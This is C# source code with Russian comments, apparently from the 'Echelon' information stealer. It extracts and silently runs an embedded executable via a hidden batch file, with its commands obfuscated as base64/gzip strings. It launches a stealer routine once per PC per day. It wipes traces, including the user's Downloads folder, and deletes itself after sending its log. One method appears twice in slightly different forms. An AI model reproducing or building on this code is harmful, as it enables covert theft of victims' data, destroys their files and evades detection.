// Получаем VolumeSerialNumber
public static void Deocder()
{
// Извлекаем exe из ресурсов во временную папку
File.WriteAllBytes(Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEAIuJcUlNzk9JLdJLrUgFAPWHUugNAAAA"), Properties.Resources.Decoder);
// Создает временный .cmd и им запускаем наши файлы
string batch = Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEANNLzk0BAMPCtLEEAAAA");
using (StreamWriter sw = new StreamWriter(batch))
{
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNITc7IV8hPSwMAyqnEkQkAAAA="));
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEACvJzE3NLy1RMFGwU/AL9QEAGpgiIA8AAAA=")); // Задержка до выполнения следуюющих команд
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAAsOcQwKUQAA789iXwYAAAA=") + "\"" + "\" " + "\"" + Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEAIuJcUlNzk9JLdJLrUgFAPWHUugNAAAA") + "\""); // Запускаем первый билд
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHN2UQAAQkDmIgMAAAA=") + Path.GetTempPath()); // Переходим во временную папку юзера
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + Path.GetFileName(batch) + "\"" + " /f /q"); // Удаляем .cmd
}
Process.Start(new ProcessStartInfo()
{
FileName = batch,
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
});
}
public static void Deocder()
{
File.WriteAllBytes(Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEAIuJcUlNzk9JLdJLrUgFAPWHUugNAAAA"), Properties.Resources.Decoder);
string batch = Path.GetTempPath() + Decrypt.Get("H4sIAAAAAAAEANNLzk0BAMPCtLEEAAAA");
using (StreamWriter sw = new StreamWriter(batch)) {
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNITc7IV8hPSwMAyqnEkQkAAAA="));
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEACvJzE3NLy1RMFGwU/AL9QEAGpgiIA8AAAA=")); // Задержка до выполнения следуюющих команд
File.WriteAllBytes(Decrypt.Get(@"H4sIAAAAAAAEAHO2igkoyk8vSsx1SSxJjHFJTc5PSS3SS61IBQCMqrk/GgAAAA=="), Echelon.Properties.Resources.Decoder);
Process.Start(Decrypt.Get(@"H4sIAAAAAAAEAHO2igkoyk8vSsx1SSxJjHFJTc5PSS3SS61IBQCMqrk/GgAAAA=="));
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHN2UQAAQkDmIgMAAAA=") + Path.GetTempPath()); // Переходим во временную папку юзера
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + Path.GetFileName(batch) + "\"" + " /f /q"); // Удаляем .cmd
}
Process.Start(new ProcessStartInfo()
{
FileName = batch,
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
});
}
private static void Main()
{
try
{
// Подключаем нужные библиотеки
AppDomain.CurrentDomain.AssemblyResolve += AppDomain_AssemblyResolve;
Assembly AppDomain_AssemblyResolve(object sender, ResolveEventArgs args)
{
if (args.Name.Contains("DotNetZip"))
{
return(Assembly.Load(Resources.DotNetZip));
}
return(null);
}
// Проверка файла Help.HWID
if (!File.Exists(Help.LocalData + "\\" + Help.HWID))
{
// Файла Help.HWID нет, запускаем стиллер
Collection.GetCollection();
}
else
{
// Файл Help.HWID есть, проверяем записанную в нем дату
if (!File.ReadAllText(Help.LocalData + "\\" + Help.HWID).Contains(Help.HWID + Help.dateLog))
{
// Дата в файле Help.HWID отличается от сегодняшней, запускаем стиллер
Collection.GetCollection();
}
else
{
// В файле Help.HWID сегодняшняя дата, закрываемся, означает что сегодня уже был лог с данного пк и не нужно слать повторы.
Environment.Exit(0);
}
}
}
catch
{
Clean.GetClean();
return;
}
finally
{
// Чистим следы за собой, небольшой метод вторичной проверки. Так же метод очищает папку Downloads у юзера
Clean.GetClean();
// Самоудаление после отправки лога
string batch = Path.GetTempFileName() + Decrypt.Get("H4sIAAAAAAAEANNLzk0BAMPCtLEEAAAA");
using (StreamWriter sw = new StreamWriter(batch))
{
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAFNySE3OyFfIT0sDAP8G798KAAAA")); // скрываем консоль
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEACvJzE3NLy1RMFGwU/AL9QEAGpgiIA8AAAA=")); // Задержка до выполнения следуюющих команд в секундах.
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + Path.GetFileName(new FileInfo(new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath).Name) + "\"" + " /f /q"); // Удаляем исходный билд
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHN2UQAAQkDmIgMAAAA=") + Path.GetTempPath()); // Переходим во временную папку юзера
sw.WriteLine(Decrypt.Get("H4sIAAAAAAAEAHNx9VEAAJx/wSQEAAAA") + "\"" + batch + "\"" + " /f /q"); // Удаляем .cmd
}
Process.Start(new ProcessStartInfo()
{
FileName = batch,
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
});
Environment.Exit(0);
}
}
